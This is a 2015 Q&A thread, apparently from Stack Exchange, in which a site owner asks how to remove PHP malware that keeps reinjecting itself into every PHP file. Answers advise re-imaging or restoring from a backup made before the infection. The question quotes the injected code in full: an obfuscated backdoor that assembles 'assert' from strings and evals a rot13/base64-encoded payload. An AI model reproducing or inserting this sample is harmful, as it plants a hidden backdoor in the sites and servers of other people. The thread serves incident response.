PHP mallware attack

Question

I'm desprate because my site has been attacked by some malware that adds code below on every php files. I tried to edit and chmod the infected file but its coming back. Scanning with ClamAV found nothing. Any idea how to clean it?

<?php
//###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
if (!@$m1cd6) {$m1cd6=1;@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));}
//###==###

Format drive and reinstall OS and apps. If you restore from a backup, make sure that it is a backup that took place before the infection. — Neil Smithline, Sep 24 '15 at 17:53

score 1 · Answer 1 · answered Sep 24 '15 at 18:15

1

If you have Malware that is attacking System-Level files, you should Rebuild or Re-Image that system entirely. In this case, a simple Malware or Anti-Virus Scan may not catch it, especially if the process it is running on is a common one, or is not recognized by your A/V or Scanning Software.

Use a top-down approach to scanning every part of your network/system, but start with Re-imaging the Suspect System.

answered Sep 24 '15 at 18:15

user58700

126
6

It's a shared hosting environment with su php. It is imposibble to rebuild entire system – Mohammad Irfan Sep 24 '15 at 18:24
@MohammadIrfan - I would say that it is impossible to secure a shared hosting system with PHP running as root. Your machine is only as secure as the weakest of sites on that machine. – Neil Smithline Sep 24 '15 at 18:27
I agree with Neil, you should always have a plan in place to rebuild from the ground-up in case of an integrated malware attack. Depending on the attack vector, you may get away with simply re-imaging only certain servers, but at this point we don't have enough information to recommend otherwise. – user58700 Sep 25 '15 at 17:59

PHP mallware attack

1 Answers1